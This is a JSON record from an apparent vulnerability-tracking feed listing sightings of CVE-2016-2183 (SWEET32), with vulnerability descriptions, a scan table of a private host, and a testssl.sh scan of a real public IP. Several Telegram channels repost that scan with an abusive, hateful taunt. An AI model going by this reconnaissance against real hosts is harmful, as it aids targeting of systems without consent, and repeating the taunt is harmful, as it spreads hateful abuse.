{"vulnerability": "cve-2016-2183", "sightings": [{"uuid": "f36c18c0-a2be-42b2-a163-41e328bad4a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://infosec.exchange/users/certvde/statuses/115093680188761999", "content": "", "creation_timestamp": "2025-08-26T06:36:28.916487Z"}, {"uuid": "80286d08-cc7a-4c81-8886-c1fc7755a7ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "published-proof-of-concept", "source": "Telegram/cQf2CT3r4WvnJhAn_Z5tbBdbHlIor2zaa0XkqChp6pgA9CQ", "content": "", "creation_timestamp": "2025-12-13T09:00:04.000000Z"}, {"uuid": "2d857ff8-553b-460f-b6f9-3ec2a3a2b6be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://infosec.exchange/users/certvde/statuses/116362045594819401", "content": "", "creation_timestamp": "2026-04-07T06:38:29.141687Z"}, {"uuid": "7cd2f2f0-d241-4e78-9d23-36ba604bbdac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://bsky.app/profile/certvde.infosec.exchange.ap.brid.gy/post/3miv663v4rpz2", "content": "", "creation_timestamp": "2026-04-07T06:38:33.050774Z"}, {"uuid": "804d205f-dbc0-45c9-954e-ead94850d3e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/10542", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-0296\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: The 
Birthday attack against 64-bit block ciphers flaw (CVE-2016-2183) was reported for the health checks port (9979) on etcd grpc-proxy component. Even though the CVE-2016-2183 has been fixed in the etcd components, to enable periodic health checks from kubelet, it was necessary to open up a new port (9979) on etcd grpc-proxy, hence this port might be considered as still vulnerable to the same type of vulnerability. The health checks on etcd grpc-proxy do not contain sensitive data (only metrics data), therefore the potential impact related to this vulnerability is minimal. The CVE-2023-0296 has been assigned to this issue to track the permanent fix in the etcd component.\n\ud83d\udccf Published: 2023-01-17T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-04T18:48:51.215Z\n\ud83d\udd17 References:\n1. https://bugzilla.redhat.com/show_bug.cgi?id=2161287", "creation_timestamp": "2025-04-04T19:36:56.000000Z"}, {"uuid": "aabb0827-722d-43e5-a5d7-c412d5f0b4ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://t.me/ETHICALHACKERSCOMMUNITY2/3548", "content": "\u2521\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529\n\u2502 192.168.0.10 \u2502          \u2502      \u2502            \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 \u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n\n[Open 
ports]\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 ip           \u2503 proto \u2503 port \u2503 service     \u2503 product      \u2503 version                       \u2503\n\u2521\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529\n\u2502 192.168.0.10 \u2502 tcp   \u2502 21   \u2502 ftp         \u2502 ProFTPD      \u2502 1.3.5                      \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 22   \u2502 ssh         \u2502 OpenSSH      \u2502 6.6.1p1 Ubuntu 2ubuntu2.10 \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 80   \u2502 http        \u2502 Apache httpd \u2502 2.4.7                      \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 445  \u2502 netbios-ssn \u2502 Samba smbd   \u2502 3.X - 4.X                  \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 631  \u2502 ipp         \u2502 CUPS         \u2502 1.7                        
\u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n\n[Vulnerabilities]\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 ip           \u2503 proto \u2503 port \u2503 vuln_name                                                           \u2503 cve            
\u2503\n\u2521\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529\n\u2502 192.168.0.10 \u2502 tcp   \u2502 0    \u2502 TCP Timestamps Information Disclosure (https://www.kitploit.com/search/label/Information%20Disclosure)                               \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 21   \u2502 FTP Unencrypted Cleartext Login                                     \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 22   \u2502 Weak MAC Algorithm(s) Supported (SSH)                               \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 22   \u2502 Weak Encryption Algorithm(s) Supported (SSH)                        \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 22   \u2502 Weak Host Key Algorithm(s) (SSH)                                    \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 22   \u2502 Weak Key Exchange (KEX) Algorithm(s) Supported (SSH)                \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 80   \u2502 Test HTTP dangerous methods                                            \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 80   \u2502 Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check    \u2502 CVE-2014-3704  \u2502\n\u2502 
192.168.0.10 \u2502 tcp   \u2502 80   \u2502 Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 80   \u2502 Sensitive File Disclosure (HTTP)                                    \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 80   \u2502 Unprotected Web App / Device Installers (HTTP)                      \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 80   \u2502 Cleartext Transmission of Sensitive Information (https://www.kitploit.com/search/label/Sensitive%20Information) via HTTP            \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 80   \u2502 jQuery < 1.9.0 XSS Vulnerability                                    \u2502 CVE-2012-6708  \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 80   \u2502 jQuery < 1.6.3 XSS Vulnerability                                    \u2502 CVE-2011-4969  \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 80   \u2502 Drupal 7.0 Information Disclosure Vulnerability - Active Check      \u2502 CVE-2011-3730  \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 631  \u2502 SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                  \u2502 CVE-2016-2183  \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 631  \u2502 SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                  \u2502 CVE-2016-6329  \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 631  \u2502 SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                  \u2502 CVE-2020-12872 \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 631  \u2502 SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection          \u2502 CVE-2011-3389  \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 631  \u2502 SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection          \u2502 CVE-2015-0204  
\u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500&amp;   #9472;\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n\n[Users]", "creation_timestamp": "2024-01-08T12:19:23.000000Z"}, {"uuid": "0b9cc534-7b41-44ac-90f3-167e2286a131", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://t.me/endsodomaofficial/7318", "content": "====== Running in file batch mode with file=\"hosts/ips.txt\" ======\n\n==========================\n/root/Tools/testssl.sh/testssl.sh --quiet --color 0 -U --warnings=batch 77.81.101.111\n\n\n Start 2024-02-14 22:13:09                --&gt;&gt; 77.81.101.111:443 (77.81.101.111) &lt;&lt;--\n\n rDNS (77.81.101.111):   --\n Service detected:       HTTP\n\n\n Testing vulnerabilities\n\n Heartbleed (CVE-2014-0160)                not vulnerable (OK), no heartbeat extension\n CCS (CVE-2014-0224)                       not vulnerable (OK)\n Ticketbleed (CVE-2016-9244), experiment.  
not vulnerable (OK)\n ROBOT                                     not vulnerable (OK)\n Secure Renegotiation (RFC 5746)           supported (OK)\n Secure Client-Initiated Renegotiation     not vulnerable (OK)\n CRIME, TLS (CVE-2012-4929)                not vulnerable (OK)\n BREACH (CVE-2013-3587)                    no gzip/deflate/compress/br HTTP compression (OK)  - only supplied \"/\" tested\n POODLE, SSL (CVE-2014-3566)               not vulnerable (OK)\n TLS_FALLBACK_SCSV (RFC 7507)              Downgrade attack prevention supported (OK)\n SWEET32 (CVE-2016-2183, CVE-2016-6329)    not vulnerable (OK)\n FREAK (CVE-2015-0204)                     not vulnerable (OK)\n DROWN (CVE-2016-0800, CVE-2016-0703)      not vulnerable on this host and port (OK)\n                                           make sure you don't use this certificate elsewhere with SSLv2 enabled services, see\n                                           https://search.censys.io/search?resource=hosts&virtual_hosts=INCLUDE&q=84359F27151AC6F21A23D865CCD523FADB0B99CE8E33878E67081E5BFF1D759C\n LOGJAM (CVE-2015-4000), experimental      common prime with 2048 bits detected: HAProxy (2048 bits),\n                                           but no DH EXPORT ciphers\n BEAST (CVE-2011-3389)                     TLS1: ECDHE-RSA-AES256-SHA\n                                                 HE-RSA-AES256-SHA\n                                                 CDHE-RSA-AES128-SHA\n                                                 HE-RSA-AES128-SHA\n                                                 ES256-SHA\n                                                 ES128-SHA\n                                           VULNERABLE -- but also supports higher protocols  TLSv1.1 TLSv1.2 (likely mitigated)\n LUCKY13 (CVE-2013-0169), experimental     potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS. 
Check patches\n Winshock (CVE-2014-6321), experimental    not vulnerable (OK)\n RC4 (CVE-2013-2566, CVE-2015-2808)        no RC4 ciphers detected (OK)\n\n\n Done 2024-02-14 22:15:15 [ 152s] -->> 77.81.101.111:443 (77.81.101.111) <<--\n\nYou got fucked RealitateaTV MOSSAD ISIS, Zionist Bastard \ud83d\ude01", "creation_timestamp": "2024-02-15T00:49:09.000000Z"}, {"uuid": "13c34206-ab4f-4efb-aa46-e0fd5f69f1c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://t.me/jokerssec/1351", "content": "====== Running in file batch mode with file=\"hosts/ips.txt\" ======\n\n==========================\n/root/Tools/testssl.sh/testssl.sh --quiet --color 0 -U --warnings=batch 77.81.101.111\n\n\n Start 2024-02-14 22:13:09                -->> 77.81.101.111:443 (77.81.101.111) <<--\n\n rDNS (77.81.101.111):   --\n Service detected:       HTTP\n\n\n Testing vulnerabilities\n\n Heartbleed (CVE-2014-0160)                not vulnerable (OK), no heartbeat extension\n CCS (CVE-2014-0224)                       not vulnerable (OK)\n Ticketbleed (CVE-2016-9244), experiment.  
not vulnerable (OK)\n ROBOT                                     not vulnerable (OK)\n Secure Renegotiation (RFC 5746)           supported (OK)\n Secure Client-Initiated Renegotiation     not vulnerable (OK)\n CRIME, TLS (CVE-2012-4929)                not vulnerable (OK)\n BREACH (CVE-2013-3587)                    no gzip/deflate/compress/br HTTP compression (OK)  - only supplied \"/\" tested\n POODLE, SSL (CVE-2014-3566)               not vulnerable (OK)\n TLS_FALLBACK_SCSV (RFC 7507)              Downgrade attack prevention supported (OK)\n SWEET32 (CVE-2016-2183, CVE-2016-6329)    not vulnerable (OK)\n FREAK (CVE-2015-0204)                     not vulnerable (OK)\n DROWN (CVE-2016-0800, CVE-2016-0703)      not vulnerable on this host and port (OK)\n                                           make sure you don't use this certificate elsewhere with SSLv2 enabled services, see\n                                           https://search.censys.io/search?resource=hosts&virtual_hosts=INCLUDE&q=84359F27151AC6F21A23D865CCD523FADB0B99CE8E33878E67081E5BFF1D759C\n LOGJAM (CVE-2015-4000), experimental      common prime with 2048 bits detected: HAProxy (2048 bits),\n                                           but no DH EXPORT ciphers\n BEAST (CVE-2011-3389)                     TLS1: ECDHE-RSA-AES256-SHA\n                                                 HE-RSA-AES256-SHA\n                                                 CDHE-RSA-AES128-SHA\n                                                 HE-RSA-AES128-SHA\n                                                 ES256-SHA\n                                                 ES128-SHA\n                                           VULNERABLE -- but also supports higher protocols  TLSv1.1 TLSv1.2 (likely mitigated)\n LUCKY13 (CVE-2013-0169), experimental     potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS. 
Check patches\n Winshock (CVE-2014-6321), experimental    not vulnerable (OK)\n RC4 (CVE-2013-2566, CVE-2015-2808)        no RC4 ciphers detected (OK)\n\n\n Done 2024-02-14 22:15:15 [ 152s] -->> 77.81.101.111:443 (77.81.101.111) <<--\n\nYou got fucked RealitateaTV MOSSAD ISIS, Zionist Bastard \ud83d\ude01", "creation_timestamp": "2024-02-15T03:00:05.000000Z"}, {"uuid": "b781c8a6-a062-4d2d-be91-134d4b751051", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://t.me/marianaalecu/3622", "content": "====== Running in file batch mode with file=\"hosts/ips.txt\" ======\n\n==========================\n/root/Tools/testssl.sh/testssl.sh --quiet --color 0 -U --warnings=batch 77.81.101.111\n\n\n Start 2024-02-14 22:13:09                -->> 77.81.101.111:443 (77.81.101.111) <<--\n\n rDNS (77.81.101.111):   --\n Service detected:       HTTP\n\n\n Testing vulnerabilities\n\n Heartbleed (CVE-2014-0160)                not vulnerable (OK), no heartbeat extension\n CCS (CVE-2014-0224)                       not vulnerable (OK)\n Ticketbleed (CVE-2016-9244), experiment.  
not vulnerable (OK)\n ROBOT                                     not vulnerable (OK)\n Secure Renegotiation (RFC 5746)           supported (OK)\n Secure Client-Initiated Renegotiation     not vulnerable (OK)\n CRIME, TLS (CVE-2012-4929)                not vulnerable (OK)\n BREACH (CVE-2013-3587)                    no gzip/deflate/compress/br HTTP compression (OK)  - only supplied \"/\" tested\n POODLE, SSL (CVE-2014-3566)               not vulnerable (OK)\n TLS_FALLBACK_SCSV (RFC 7507)              Downgrade attack prevention supported (OK)\n SWEET32 (CVE-2016-2183, CVE-2016-6329)    not vulnerable (OK)\n FREAK (CVE-2015-0204)                     not vulnerable (OK)\n DROWN (CVE-2016-0800, CVE-2016-0703)      not vulnerable on this host and port (OK)\n                                           make sure you don't use this certificate elsewhere with SSLv2 enabled services, see\n                                           https://search.censys.io/search?resource=hosts&virtual_hosts=INCLUDE&q=84359F27151AC6F21A23D865CCD523FADB0B99CE8E33878E67081E5BFF1D759C\n LOGJAM (CVE-2015-4000), experimental      common prime with 2048 bits detected: HAProxy (2048 bits),\n                                           but no DH EXPORT ciphers\n BEAST (CVE-2011-3389)                     TLS1: ECDHE-RSA-AES256-SHA\n                                                 HE-RSA-AES256-SHA\n                                                 CDHE-RSA-AES128-SHA\n                                                 HE-RSA-AES128-SHA\n                                                 ES256-SHA\n                                                 ES128-SHA\n                                           VULNERABLE -- but also supports higher protocols  TLSv1.1 TLSv1.2 (likely mitigated)\n LUCKY13 (CVE-2013-0169), experimental     potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS. 
Check patches\n Winshock (CVE-2014-6321), experimental    not vulnerable (OK)\n RC4 (CVE-2013-2566, CVE-2015-2808)        no RC4 ciphers detected (OK)\n\n\n Done 2024-02-14 22:15:15 [ 152s] -->> 77.81.101.111:443 (77.81.101.111) <<--\n\nYou got fucked RealitateaTV MOSSAD ISIS, Zionist Bastard \ud83d\ude01", "creation_timestamp": "2024-02-15T00:48:21.000000Z"}, {"uuid": "104edea4-f30a-45a3-a416-e45ea0e96237", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://t.me/fucklulzsecisrahell/6294", "content": "====== Running in file batch mode with file=\"hosts/ips.txt\" ======\n\n==========================\n/root/Tools/testssl.sh/testssl.sh --quiet --color 0 -U --warnings=batch 77.81.101.111\n\n\n Start 2024-02-14 22:13:09                -->> 77.81.101.111:443 (77.81.101.111) <<--\n\n rDNS (77.81.101.111):   --\n Service detected:       HTTP\n\n\n Testing vulnerabilities\n\n Heartbleed (CVE-2014-0160)                not vulnerable (OK), no heartbeat extension\n CCS (CVE-2014-0224)                       not vulnerable (OK)\n Ticketbleed (CVE-2016-9244), experiment.  
not vulnerable (OK)\n ROBOT                                     not vulnerable (OK)\n Secure Renegotiation (RFC 5746)           supported (OK)\n Secure Client-Initiated Renegotiation     not vulnerable (OK)\n CRIME, TLS (CVE-2012-4929)                not vulnerable (OK)\n BREACH (CVE-2013-3587)                    no gzip/deflate/compress/br HTTP compression (OK)  - only supplied \"/\" tested\n POODLE, SSL (CVE-2014-3566)               not vulnerable (OK)\n TLS_FALLBACK_SCSV (RFC 7507)              Downgrade attack prevention supported (OK)\n SWEET32 (CVE-2016-2183, CVE-2016-6329)    not vulnerable (OK)\n FREAK (CVE-2015-0204)                     not vulnerable (OK)\n DROWN (CVE-2016-0800, CVE-2016-0703)      not vulnerable on this host and port (OK)\n                                           make sure you don't use this certificate elsewhere with SSLv2 enabled services, see\n                                           https://search.censys.io/search?resource=hosts&virtual_hosts=INCLUDE&q=84359F27151AC6F21A23D865CCD523FADB0B99CE8E33878E67081E5BFF1D759C\n LOGJAM (CVE-2015-4000), experimental      common prime with 2048 bits detected: HAProxy (2048 bits),\n                                           but no DH EXPORT ciphers\n BEAST (CVE-2011-3389)                     TLS1: ECDHE-RSA-AES256-SHA\n                                                 HE-RSA-AES256-SHA\n                                                 CDHE-RSA-AES128-SHA\n                                                 HE-RSA-AES128-SHA\n                                                 ES256-SHA\n                                                 ES128-SHA\n                                           VULNERABLE -- but also supports higher protocols  TLSv1.1 TLSv1.2 (likely mitigated)\n LUCKY13 (CVE-2013-0169), experimental     potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS. 
Check patches\n Winshock (CVE-2014-6321), experimental    not vulnerable (OK)\n RC4 (CVE-2013-2566, CVE-2015-2808)        no RC4 ciphers detected (OK)\n\n\n Done 2024-02-14 22:15:15 [ 152s] -->> 77.81.101.111:443 (77.81.101.111) <<--\n\nYou got fucked RealitateaTV MOSSAD ISIS, Zionist Bastard \ud83d\ude01", "creation_timestamp": "2024-02-15T02:55:48.000000Z"}, {"uuid": "522ecc10-d490-4b85-b662-0e10fcbfb0e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://t.me/thegoodfatherag/8840", "content": "====== Running in file batch mode with file=\"hosts/ips.txt\" ======\n\n==========================\n/root/Tools/testssl.sh/testssl.sh --quiet --color 0 -U --warnings=batch 77.81.101.111\n\n\n Start 2024-02-14 22:13:09                -->> 77.81.101.111:443 (77.81.101.111) <<--\n\n rDNS (77.81.101.111):   --\n Service detected:       HTTP\n\n\n Testing vulnerabilities\n\n Heartbleed (CVE-2014-0160)                not vulnerable (OK), no heartbeat extension\n CCS (CVE-2014-0224)                       not vulnerable (OK)\n Ticketbleed (CVE-2016-9244), experiment.  
not vulnerable (OK)\n ROBOT                                     not vulnerable (OK)\n Secure Renegotiation (RFC 5746)           supported (OK)\n Secure Client-Initiated Renegotiation     not vulnerable (OK)\n CRIME, TLS (CVE-2012-4929)                not vulnerable (OK)\n BREACH (CVE-2013-3587)                    no gzip/deflate/compress/br HTTP compression (OK)  - only supplied \"/\" tested\n POODLE, SSL (CVE-2014-3566)               not vulnerable (OK)\n TLS_FALLBACK_SCSV (RFC 7507)              Downgrade attack prevention supported (OK)\n SWEET32 (CVE-2016-2183, CVE-2016-6329)    not vulnerable (OK)\n FREAK (CVE-2015-0204)                     not vulnerable (OK)\n DROWN (CVE-2016-0800, CVE-2016-0703)      not vulnerable on this host and port (OK)\n                                           make sure you don't use this certificate elsewhere with SSLv2 enabled services, see\n                                           https://search.censys.io/search?resource=hosts&virtual_hosts=INCLUDE&q=84359F27151AC6F21A23D865CCD523FADB0B99CE8E33878E67081E5BFF1D759C\n LOGJAM (CVE-2015-4000), experimental      common prime with 2048 bits detected: HAProxy (2048 bits),\n                                           but no DH EXPORT ciphers\n BEAST (CVE-2011-3389)                     TLS1: ECDHE-RSA-AES256-SHA\n                                                 HE-RSA-AES256-SHA\n                                                 CDHE-RSA-AES128-SHA\n                                                 HE-RSA-AES128-SHA\n                                                 ES256-SHA\n                                                 ES128-SHA\n                                           VULNERABLE -- but also supports higher protocols  TLSv1.1 TLSv1.2 (likely mitigated)\n LUCKY13 (CVE-2013-0169), experimental     potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS. 
Check patches\n Winshock (CVE-2014-6321), experimental    not vulnerable (OK)\n RC4 (CVE-2013-2566, CVE-2015-2808)        no RC4 ciphers detected (OK)\n\n\n Done 2024-02-14 22:15:15 [ 152s] -->> 77.81.101.111:443 (77.81.101.111) <<--\n\nYou got fucked RealitateaTV MOSSAD ISIS, Zionist Bastard \ud83d\ude01", "creation_timestamp": "2024-02-15T03:24:44.000000Z"}, {"uuid": "c047f746-4105-4f03-bd52-4dc01b957bc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://t.me/cibsecurity/56622", "content": "\u203c CVE-2023-0296 \u203c\n\nThe Birthday attack against 64-bit block ciphers flaw (CVE-2016-2183) was reported for the health checks port (9979) on etcd grpc-proxy component. Even though the CVE-2016-2183 has been fixed in the etcd components, to enable periodic health checks from kubelet, it was necessary to open up a new port (9979) on etcd grpc-proxy, hence this port might be considered as still vulnerable to the same type of vulnerability. The health checks on etcd grpc-proxy do not contain sensitive data (only metrics data), therefore the potential impact related to this vulnerability is minimal. 
The CVE-2023-0296 has been assigned to this issue to track the permanent fix in the etcd component.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-01-18T00:15:22.000000Z"}, {"uuid": "ba399fd2-17ab-4a17-8585-f488d97852dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://gist.github.com/tejassesh5/26e63dfa642914dd0891e872144d7d4e", "content": "\n\n\n\nWeb Application Penetration Test Report \u2014 SAMPLE\n\n  .evidence-note { background: 
\n\nConfidential \u2014 Redacted Sample\nWeb Application Penetration Test Report\nOWASP Top 10 \u00b7 Session Management \u00b7 TLS Configuration \u00b7 SOC 2 Alignment\n\nClient: REDACTED CLIENT LTD\nTarget Application: https://app.REDACTED.com\nEnvironment: Production (read-only scope)\nTest Period: XX/XX/202X to XX/XX/202X\nReport Version: 1.0 Final\nPrepared By: Tejas D. \u00b7 Independent Security Consultant\nClassification: CONFIDENTIAL \u2014 Client Eyes Only\n\nPENTEST REPORT\nThis document is confidential. Unauthorized distribution prohibited.\n\n1. Executive Summary\n\nAn independent web application penetration test was conducted against REDACTED's core business platform. Testing followed OWASP Testing Guide v4.2 and aligned with SOC 2 Type II security control requirements.\n\nSix vulnerabilities were identified: 1 High, 2 Medium, 2 Low, 1 Informational. No critical vulnerabilities were found. 
